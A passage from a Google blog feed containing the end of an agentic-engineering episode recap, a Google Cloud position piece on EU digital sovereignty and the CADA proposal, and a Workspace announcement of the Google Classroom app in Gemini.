&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Production Failures:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rody agrees that vibe coding will cause significant production failures, leading to a new hot job for software engineers: consulting to solve those failures.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Codebase Health:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rody argues that poor codebase health, not context windows, is the biggest bottleneck in AI speed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Grounding Yourself in a Changing Landscape&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1870s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;31:10&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody advises engineers to focus on &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;why&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; they were hired: to solve problems and engineer things that didn't exist before. He suggests using AI to provide better communication handoffs between colleagues, making artifacts so easy to approve that they are "ready to sign off" the moment they are handed over.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The era of agentic engineering is here, but as Rody Davis demonstrated, it requires more architectural discipline, not less. By treating your codebase like a Bonsai tree and your agents like an orchestra, you can move past the "toil" and focus on building the frameworks of the future.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Your turn to build&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Are you ready to build anything? We’ve officially launched the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;#NapkinChallenge&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Take a handwritten sketch of an app idea, use Antigravity 2.0 to build it, and share your creation on social media.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Try Antigravity 2.0:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://goo.gle/4fnXilj" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;antigravity.google&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Join the Challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://goo.gle/4e0AGF6" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Napkin Challenge Details&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Rody’s personal &lt;/strong&gt;&lt;a href="https://rodydavis.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;website&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://github.com/rodydavis/rodydavis" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;github repo&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://github.com/rodydavis/skills" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;skills&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Connect with us&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Rody Davis&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; → &lt;/span&gt;&lt;a href="https://goo.gle/Rody-on-X" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://goo.gle/Rody-on-LinkedIn" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Shir Meir Lador&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; → &lt;/span&gt;&lt;a href="https://goo.gle/Shir-on-X" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://goo.gle/Shir-on-LinkedIn" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-100x-engineering-with-ai-agents-in-google-antigravity-20/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/choice-compliance-and-collaboration-europes-path-to-open-digital-sovereignty/</id>
    <title>Choice, compliance, and collaboration: Europe’s path to open digital sovereignty</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The European Commission’s Tech Sovereignty Package comes at a defining moment for the continent's digital future. European competitiveness and security are top of the agenda for European business, institutions, and citizens, and a significant investment in European digital capacity is needed to deliver those goals. In that context, it is understandable that Europe is considering how to boost the European Union digital footprint from chips, to cloud adoption, to AI data infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The European Commission’s strategy is to be grounded in "openness, partnership, and fair competition." Indeed, the package contains bold measures consistent with these principles on interoperability to address vendor lock-in and an open source strategy for the public sector, as well as on more rapid data center deployment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will work cooperatively with the EU institutions providing our best knowledge about how to achieve these stated objectives in practical terms. To that end, we believe certain elements of the Cloud and AI Development Act (CADA) should be changed to avoid unintended market isolation, ensuring that trusted global partners can continue to support Europe’s security and scaling goals under a framework of true openness. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our approach to sovereignty, developed over many years, is grounded in delivering tangible, technical, and verifiable control and open choice, while investing in the growth and security of Europe’s digital infrastructure — consistent with what we understand to be the goals of this strategy. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We have engineered a comprehensive menu of &lt;/span&gt;&lt;a href="https://cloud.google.com/sovereign-cloud"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Sovereign Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; solutions, designed to meet Europe's tiered compliance requirements at every level. From standard public cloud configurations with strict European data boundaries to independently operated regional cloud services to fully air-gapped solutions for the most sensitive public-sector operations, we ensure that compliance never requires sacrificing technological excellence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through our deep “Made with Europe” collaborations with regional champions — including S3NS in France; Thales, the Schwarz Group, and T-Systems in Germany; PSN in Italy; Clarence in Luxembourg; and Telefónica in Spain — we are actively delivering the operational resilience and jurisdictional controls designed to meet the highest regulatory standards of existing sovereignty frameworks at national level. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Across our partner-led sovereign solutions, the S3NS offering in France has been qualified to meet &lt;/span&gt;&lt;a href="https://www.thalesgroup.com/en/news-centre/press-releases/s3ns-announces-secnumcloud-qualification-premi3ns-its-trusted-cloud" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SecNumCloud 3.2, Europe’s highest sovereignty regulatory bar&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Our partners Clarence and S3NS, together with Mistral, offer services that have been approved by the EU Directorate-General for Digital Services (DIGIT) for use by EU Institutions who have sovereign cloud needs. We believe this is what constitutes a true trusted partnership and encourage the Commission to follow this existing path, which is already meeting sovereign expectations across Europe today. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Refining sovereign certification &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A primary concern within the CADA proposal is the design of the Union Assurance Levels (UALs). While harmonizing sovereignty criteria across member states is a constructive step, criteria at each of the four UALs would limit or exclude global providers, regardless of the security mitigations they offer.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Regulations should create space for innovative and effective technology approaches to sovereign control, instead of rigid geographic criteria that sacrifice the potential to have control without undue disruption to global supply chains. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We understand and support the data sovereignty and extra-territorial risk-mitigation priorities of European policymakers. Through capabilities like Cloud External Key Manager (EKM), one of the tools within our suite of sovereign solutions, Google Cloud allows customers to maintain their encryption keys outside of Google's infrastructure. This control creates a technical barrier to unauthorized access to unencrypted data by third parties without the explicit consent and awareness of the customer. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The EU has already designed an alternative, more balanced model in the proposed &lt;/span&gt;&lt;a href="https://single-market-economy.ec.europa.eu/publications/industrial-accelerator-act_en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Industrial Accelerator Act&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This framework has the potential to successfully maintain collaboration with trusted non-EU partners under a default presumption that trusted partners can operate as EU origin, underpinned by robust global trade rules and strong back-stop powers. We urge co-legislators to apply a similar philosophy to CADA.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Promoting interoperability, combating vendor lock-in, and reforming procurement&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Sovereignty must empower end-users with more choice, not less. A healthy European digital ecosystem requires open foundations that prevent vendor lock-in, restrict choice, and drive up costs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We strongly support CADA's goal to foster an open, interoperable cloud ecosystem. To make this meaningful, we believe that the policy must align with a commitment to openness across every level of the digital stack — infrastructure, models, and applications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our own approach is built on this foundation: We offer open, portable infrastructure with &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/networking/eliminating-data-transfer-fees-when-migrating-off-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;no data transfer exit fees&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we champion open AI models like Gemma, and we support open-standards applications. Our stack-wide open approach is designed to help European enterprises build, migrate, and scale without friction.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Yet organizations can’t maximize the benefits of an open approach because restrictive licensing practices lock customers into a single ecosystem. To restore true choice, we advocate for three straightforward reforms: allowing users to move their software licenses freely, ensuring fair pricing for legacy software, and guaranteeing that software runs equally well on any cloud platform.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Building sustainable, open infrastructure for Europe's AI future&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Physical compute infrastructure is the bedrock of digital sovereignty. While we support the ambitions of the &lt;/span&gt;&lt;a href="https://digital-strategy.ec.europa.eu/en/library/proposal-chips-act-20" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Chips Act 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to invest €30 billion in European semiconductor research and development, we believe that this investment is just as important as establishing regulatory rules that attract large scale investments in compute infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help achieve that goal, we recommend the measures outlined below. As a long-standing investor in European data infrastructure, operating 13 European cloud regions and deepening that commitment with recent investments in Germany, Belgium and Sweden, we hope to see a policy that leverages the pace and scale of committed global investors like us. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We welcome the introduction of "special project" status to streamline permitting, grid access, and power purchase agreements (PPAs) in designated zones. To ensure these measures succeed, we support:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prioritizing fast-track permitting benefits for highly sustainable infrastructure projects.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Aligning national sustainability criteria with the upcoming EU-wide rating scheme, ensuring it does not penalize energy-efficient technologies like water cooling.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ensuring that these acceleration zones do not artificially constrain the geographic location of new sites, and extending supportive grid connection measures to viable data centers operating outside of designated zones.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The path forward: Made with Europe&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As ministers prepare to gather for the upcoming Council Summit, Europe has a historic opportunity to build a resilient, competitive, and truly open digital future.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By championing open-source software — from our contributions to Kubernetes, Chromium, Android, TensorFlow, and open AI models like Gemma — and by co-engineering solutions with Europe's industrial leaders, we are proving that global innovation and European values can be furthered together.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We look forward to collaborating with Member States, European policymakers and our regional partners to ensure that the final Tech Sovereignty Package fosters local economic growth, safeguards national security, and keeps Europe at the cutting edge of global AI innovation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/choice-compliance-and-collaboration-europes-path-to-open-digital-sovereignty/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/classroom-app-in-gemini.html</id>
    <title>Make Gemini more helpful and relevant to your teaching goals with the Google Classroom app in Gemini</title>
    <updated>2026-06-18T00:49:17+00:00</updated>
    <content type="html">Educators have shared that AI is especially helpful when it understands the context of their teaching environment, from tailoring resources toward student needs or building on their existing materials. To support this, Gemini will be able to collaborate with your Google Classroom, using context from your classes to inform its outputs or help complete tasks. For example, educators can get insights on student progress and understanding, create resources and differentiated materials based on Classroom context, or get help drafting posts and assignments.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Students 18 and older can similarly use the Classroom app to stay organized across classes – from getting a list of upcoming assignments, creating study plans, doing test practice based on Classroom content, and staying up-to-date on the latest announcements. 

Based on your prompts, Gemini will identify when context from Google Classroom will be relevant, and use it to inform its outputs. You can also explicitly tell Gemini to use information from your Google Classroom account by typing, “@Classroom” and clicking on the Classroom app when it pops up.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For example, educators can ask Gemini to:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Draft communications: &lt;/b&gt;Draft communications and posts based on your Google Classroom information.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Draft differentiated assignments and plans:&lt;/b&gt; Help draft and update assignments, and generate timelines and structured plans, based on information and content from your Google Classroom.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Understand student progress and take action: &lt;/b&gt;Summarize who has submitted assignments, how students have done on prior assignments, and identify where students might need additional teacher support.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Streamline administrative tasks: &lt;/b&gt;Update assignment titles, descriptions, and more across multiple classes in draft mode, make seating charts, and find old assignments.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;For more prompts, best practices, and tips validated by trusted testers, take a look at our &lt;a href="https://services.google.com/fh/files/misc/google_classroom_in_gemini_educator_guide.pdf" target="_blank"&gt;Classroom app onboarding guide for educators&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;Important notes&lt;/h4&gt;&lt;div&gt;Gemini Apps can’t perform certain actions in the Google Classroom app, like:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Enter grades or provide private feedback directly&lt;/li&gt;&lt;li&gt;Delete, archive, or directly post assignments or announcements (it can post to draft)&lt;/li&gt;&lt;li&gt;Create rubrics&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;This feature will be available in English for users designated as over the age of 18 who are using a Google Workspace for Education or Business account in Classroom and Gemini. The Classroom app in Gemini does not currently support data regionalization and your usage data may be stored outside of your designated data region. Data region support for the Classroom app in Gemini is expected later this year.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Access to the Classroom app in Gemini will be ON by default for all Education domains and can be disabled at the OU or group level. For all other domains, access will be OFF by default and can be enabled at the OU or group level. Access can be turned on or off with a new &lt;b&gt;Classroom app&lt;/b&gt; setting in the Gemini section of the Admin console. Visit the Help Center to &lt;a href="https://support.google.com/a/answer/15293691" target="_blank"&gt;learn more about turning Google apps in Gemini on or off for your organization&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsSwnx0-luG6QMkZX0hbCxPOMJYkZ4SbUrKlHS1lBA7utg7BQ_kP3JiGWqK3j-TtnM6s0nOBQOZuzkiHrPV5eQVHXpwQfz8l1V1o7ZdGyj9OmoDfO1GGEYk_EvsTB28kTELBfMYYQRUi_swZCGHg4bP2emtS7hIWDaOav5NuO5IK655stJV9J-4K2S18i/s2048/Classroom%20Gemini%20App%20Admin.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Admin console settings to control Classroom in Gemini app" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDsSwnx0-luG6QMkZX0hbCxPOMJYkZ4SbUrKlHS1lBA7utg7BQ_kP3JiGWqK3j-TtnM6s0nOBQOZuzkiHrPV5eQVHXpwQfz8l1V1o7ZdGyj9OmoDfO1GGEYk_EvsTB28kTELBfMYYQRUi_swZCGHg4bP2emtS7hIWDaOav5NuO5IK655stJV9J-4K2S18i/s16000/Classroom%20Gemini%20App%20Admin.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Your admin configuration will determine if you can use the Classroom app in Gemini. Access to the Classroom app in Gemini will be ON by default and can be disabled at the end user level in the connected apps section of the Gemini app settings. Visit the Help Center to &lt;a href="https://support.google.com/gemini/answer/14959807?sjid=5863818655263235588-NC" target="_blank"&gt;learn more about using apps connected to Gemini&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFxAVE6-f-KG1WIpQI48puSbC6zbzDCgIX3cnjmcyizek_Fsv8UntUeqSrkirlRzMFyUCGnV7SUU_X4j0SLgD7xkYEBgM1wz4gJONswLk0XrB1F0pdFrtF8bcwVdT_Jw85vKDQjkpRJlSh8-QUeGdtReFTHA9YgFSstpmCSapx3y-OlOUwCxl1-rcfXwjX/s2048/Classroom%20Gemini%20App%20User.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="End user settings to enable Classroom in Gemini app" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFxAVE6-f-KG1WIpQI48puSbC6zbzDCgIX3cnjmcyizek_Fsv8UntUeqSrkirlRzMFyUCGnV7SUU_X4j0SLgD7xkYEBgM1wz4gJONswLk0XrB1F0pdFrtF8bcwVdT_Jw85vKDQjkpRJlSh8-QUeGdtReFTHA9YgFSstpmCSapx3y-OlOUwCxl1-rcfXwjX/s16000/Classroom%20Gemini%20App%20User.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Rolling out now, with expected completion by June 18, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available in English to all Google Workspace customers who are 18 years or older and signed in to the Gemini app. &lt;a href="https://knowledge.workspace.google.com/admin/getting-started/editions/control-access-to-google-services-by-age" target="_blank"&gt;Learn more about age restrictions in Gemini app&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/16865250?sjid=764380175305792016-NC" target="_blank"&gt;Ask about your Google Classroom assignments, classes &amp;amp; more in Gemini Apps&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/15293691?hl=en" target="_blank"&gt;Turn apps in Gemini on or off&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Gemini Apps Help: &lt;a href="https://support.google.com/gemini/answer/14959807?sjid=5863818655263235588-NC" target="_blank"&gt;Use apps connected to Gemini with a work or school Google Account&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/classroom-app-in-gemini.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T00:49:17+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/classroom-app-in-gemini.html</id>
    <title>Make Gemini more helpful and relevant to your teaching goals with the Google Classroom app in Gemini</title>
    <updated>2026-06-18T00:49:17+00:00</updated>
